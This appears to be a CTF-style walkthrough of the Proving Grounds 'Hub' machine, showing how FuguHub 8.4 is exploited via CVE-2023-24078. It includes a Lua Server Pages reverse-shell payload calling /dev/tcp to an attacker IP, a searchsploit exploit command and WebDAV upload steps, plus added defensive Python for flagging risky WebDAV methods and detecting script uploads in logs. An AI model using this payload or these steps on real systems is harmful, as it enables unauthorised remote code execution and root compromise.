PG - Hub

In this walkthrough, we will be going through the Hub room from Proving Grounds. This room is rated Easy on the platform and consists of exploiting FuguHub CMS via CVE-2023-24078, which eventually gives us root on the target. So, let’s get started without any delay.

Hub

Machine Info:

Title: Hub
IP address: 192.168.171.25
Difficulty: Easy
OS: Linux
Description: Hub is an Easy rated Linux machine running FuguHub CMS, which is vulnerable to CVE-2023-24078, an RCE vulnerability.

Enumeration:

  • I started off with my regular aggressive nmap scan and found 4 open ports – 22 (SSH), 80, 8082 and 9999 (HTTP).

$ sudo nmap -A 192.168.171.25
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-28 22:48 IST

Nmap scan report for 192.168.171.25
Host is up (0.20s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.4p1: 
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-41617	3.5	https://vulners.com/prion/PRION:CVE-2021-41617
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
53/tcp   filtered domain
80/tcp   open     http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
8082/tcp open     http     Barracuda Embedded Web Server
| http-methods: 
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-server-header: BarracudaServer.com (Posix)
|_http-title: Home
| http-webdav-scan: 
|   Server Date: Sun, 28 Jan 2024 17:19:16 GMT
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  Server Type: BarracudaServer.com (Posix)
9999/tcp open     ssl/http Barracuda Embedded Web Server
| http-methods: 
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-server-header: BarracudaServer.com (Posix)
|_http-title: Home
| http-webdav-scan: 
|   Server Date: Sun, 28 Jan 2024 17:19:17 GMT
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  Server Type: BarracudaServer.com (Posix)
| ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost
| Not valid before: 2019-07-16T19:15:09
|_Not valid after:  2074-04-18T19:15:09
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/28%OT=22%CT=1%CU=39491%PV=Y%DS=4%DC=T%G=Y%TM=65B68C9
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O1=M
OS:54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%
OS:O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%
OS:DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=86
OS:60%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   202.12 ms 192.168.45.1
2   202.09 ms 192.168.45.254
3   202.91 ms 192.168.251.1
4   202.93 ms 192.168.171.25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.66 seconds

nmap scan

port 9999 open
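As an added, defender-side example (not part of the original walkthrough), the script below parses nmap's normal output and reports every open port whose http-methods or http-webdav-scan script output advertises write-capable HTTP/WebDAV methods, which is the exposure the rest of this room turns on. The sample input is a trimmed copy of the scan above embedded as a constructed string; the set of methods treated as write-capable is my own choice.

```python
import re

# Constructed sample: a trimmed copy of the nmap normal output from the scan above.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
53/tcp   filtered domain
80/tcp   open     http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
8082/tcp open     http     Barracuda Embedded Web Server
| http-methods:
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-server-header: BarracudaServer.com (Posix)
9999/tcp open     ssl/http Barracuda Embedded Web Server
| http-methods:
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
| http-webdav-scan:
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
"""

# HTTP/WebDAV methods that let a client create, modify or delete server-side content
# (my own selection; PROPFIND is read-only and therefore not included).
WRITE_METHODS = frozenset(
    {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "PATCH", "LOCK", "UNLOCK"}
)

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
RISKY_LINE = re.compile(r"^\|_?\s*Potentially risky methods:\s*(.*)$")
ALLOWED_LINE = re.compile(r"^\|_?\s*Allowed Methods:\s*(.*)$")


def parse_write_methods(nmap_output):
    """Return {port: sorted list of write-capable methods} for every open port whose
    NSE script output advertises such methods. Ports without any are omitted."""
    findings = {}
    current = None  # port whose script output we are currently inside
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, state = int(m.group(1)), m.group(3)
            current = port if state == "open" else None
            continue
        if current is None:
            continue
        m = RISKY_LINE.match(line) or ALLOWED_LINE.match(line)
        if not m:
            continue
        # Method lists are either space- or comma-separated depending on the script.
        methods = {tok.upper() for tok in re.split(r"[,\s]+", m.group(1)) if tok}
        exposed = methods & WRITE_METHODS
        if exposed:
            findings.setdefault(current, set()).update(exposed)
    return {port: sorted(ms) for port, ms in findings.items()}


def report(nmap_output):
    """Human-readable finding per port, as a list of strings."""
    return [
        f"port {port}: write-capable methods exposed: {', '.join(methods)}"
        for port, methods in sorted(parse_write_methods(nmap_output).items())
    ]


if __name__ == "__main__":
    for line in report(SAMPLE_NMAP_OUTPUT):
        print(line)
```

Run against a real scan with `nmap -sV --script http-methods,http-webdav-scan` output piped in; anything this reports on an internet-facing port should be authenticated, restricted to a non-executable directory, or disabled.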

  • Enumerating the web server on port 80 only produced a 403 Forbidden error.

403 Forbidden

  • Next, I enumerated the web server on port 8082, which revealed an application running on it. As per the nmap results, it is a “Barracuda Embedded Web Server”.

Barracuda Embedded Web Server

  • Looking around the application, I found a page where an Administrator account can be set. So, I created one with the information below.

Set Administrator Account

email - [email protected]
Admin username - admin
Password - password

Setting Administrator password

Administrator Account Saved

  • Next, I used the newly created account to log in to the CMS, configured it with the default settings and clicked Save.

CMS login panel

Configure CMS

  • Now I was able to access a Web File Server. At this point I wasn’t sure what to do next, so I fired gobuster at the target to reveal any interesting directories.

Web File Server

gobuster dir -u http://192.168.171.25/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

gobuster scan

  • Further enumeration of the application revealed a License page where the application version was shown – FuguHub 8.4.

FuguHub 8.4

CVE-2023-24078

  • I looked for known exploits for this version and found that it is vulnerable to CVE-2023-24078, an RCE vulnerability.

CVE-2023-24078

  • I copied the exploit to my current working directory using searchsploit.

searchsploit FuguHub

searchsploit -m multiple/webapps/51550.py

searchsploit FuguHub

copying the exploit

Exploitation & Getting root:

  • The exploit takes a listening IP and port for the reverse shell along with the target host and port as input. Once execution completed, it should have returned a shell to my listener, but it didn’t.

python3 51550.py -l 192.168.45.182 -p 4444 -r 192.168.171.25 -rp 8082

firing the exploit

  • So I performed the exploitation manually: I went to the target location and copied the WebDAV session URL.

http://192.168.171.25:8082/fs/

WebDAV upload functionality

WebDAV Session URL

http://192.168.171.25:8082/fs/0dae0a33426ff7bf48d68b67/

  • I prepared the Lua Server Pages script below to use as our payload.

<div style="margin-left:auto;margin-right: auto;width: 350px;">

<div id="info">
<h2>Lua Server Pages Reverse Shell</h2>
<p>Delightful, isn't it?</p>
</div>

<?lsp if request:method() == "GET" then ?>
   <?lsp os.execute("bash -c 'bash -i >& /dev/tcp/192.168.45.182/4444 0>&1'") ?>
<?lsp else ?>
   You sent a <?lsp=request:method()?> request
<?lsp end ?>

</div>

  • Next, I accessed the WebDAV share using cadaver and uploaded our script to it.

$ cadaver 
dav:!> open http://192.168.171.25:8082/fs/0dae0a33426ff7bf48d68b67/
dav:/fs/0dae0a33426ff7bf48d68b67/> cd ..
Authentication required for Web File Server on server `192.168.171.25':
Username: admin
Password: 
dav:/fs/> put rev.lsp
Uploading rev.lsp to `/fs/rev.lsp':
Progress: [=============================>] 100.0% of 364 bytes succeeded.
dav:/fs/> 

putting rev.lsp file

  • We can then trigger our shell by visiting the URL below, which gives us a shell as the root user.

http://192.168.171.25:8082/rev.lsp

got root
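As an added example from the detection side (it is not part of the original post or of the exploit), here is Python that scans web-server access log lines for the sequence just described: a write method storing a server-side script under the WebDAV root, followed by a successful GET of that script from the web root. The log lines are constructed in combined log format, the mapping of /fs/<name> to /<name> is taken from the upload and execution URLs shown above, and the list of script extensions treated as executable is an assumption.

```python
import re

# Constructed sample access-log lines (combined log format), modelled on the
# PUT-then-GET sequence in the walkthrough. They are not real server logs.
SAMPLE_LOG = """\
192.168.45.182 - admin [28/Jan/2024:17:40:01 +0000] "PROPFIND /fs/ HTTP/1.1" 207 512
192.168.45.182 - admin [28/Jan/2024:17:40:05 +0000] "PUT /fs/rev.lsp HTTP/1.1" 201 0
10.0.0.7 - - [28/Jan/2024:17:40:07 +0000] "GET /index.html HTTP/1.1" 200 1024
192.168.45.182 - - [28/Jan/2024:17:40:09 +0000] "GET /rev.lsp HTTP/1.1" 200 364
10.0.0.7 - bob [28/Jan/2024:17:42:00 +0000] "PUT /fs/report.pdf HTTP/1.1" 201 0
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
WRITE_METHODS = {"PUT", "MOVE", "COPY", "PATCH"}   # methods that can place content
SCRIPT_EXTENSIONS = (".lsp", ".lua")              # assumption: extensions the server executes
WEBDAV_PREFIX = "/fs"                             # from the page: /fs/rev.lsp was served as /rev.lsp


def web_path(path):
    """Map a WebDAV upload path to the URL the same file is served from."""
    if path.startswith(WEBDAV_PREFIX + "/"):
        return path[len(WEBDAV_PREFIX):]
    return path


def detect(log_text):
    """Scan log lines in order and return a list of (severity, description) alerts:
    MEDIUM when a write method successfully stores a server-side script,
    HIGH when that script is later fetched with a 200 (i.e. most likely executed)."""
    alerts = []
    uploaded = {}   # served path -> client IP that uploaded it
    for raw in log_text.splitlines():
        m = LOG_LINE.match(raw)
        if not m:
            continue   # unparseable line: skip rather than abort the whole scan
        method = m["method"]
        path = m["path"].split("?", 1)[0]   # ignore any query string
        status = int(m["status"])
        is_script = path.lower().endswith(SCRIPT_EXTENSIONS)
        if method in WRITE_METHODS and is_script and 200 <= status < 300:
            uploaded[web_path(path)] = m["ip"]
            alerts.append((
                "MEDIUM",
                f"{m['ip']} ({m['user']}) stored server-side script {path} via {method}",
            ))
        elif method in ("GET", "POST") and path in uploaded and status == 200:
            alerts.append((
                "HIGH",
                f"{m['ip']} executed previously uploaded script {path} "
                f"(uploaded by {uploaded[path]})",
            ))
    return alerts


if __name__ == "__main__":
    for severity, message in detect(SAMPLE_LOG):
        print(f"[{severity}] {message}")
```

The ordinary PDF upload by `bob` produces no alert, which is the point of keying on the extension and on the later execution rather than on PUT alone; in production the same logic belongs in a SIEM rule, and the real fix is to refuse write methods (or execution) in the served directory.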

  • Finally, I captured the root flag and completed the machine.

proof flag

Conclusion:

So that was “Hub” for you. We started off with a regular nmap scan and found 4 open ports – 22 (SSH), 80, 8082 and 9999 (HTTP). Enumerating the web server on port 8082 revealed a “Barracuda Embedded Web Server” running on it. We created an admin account and got access to the backend, which revealed the version as FuguHub 8.4. Looking online for known exploits showed that it is vulnerable to CVE-2023-24078, which we used to get root on the target. On that note, I would take your leave and will meet you in the next one. Till then, “Happy hacking”.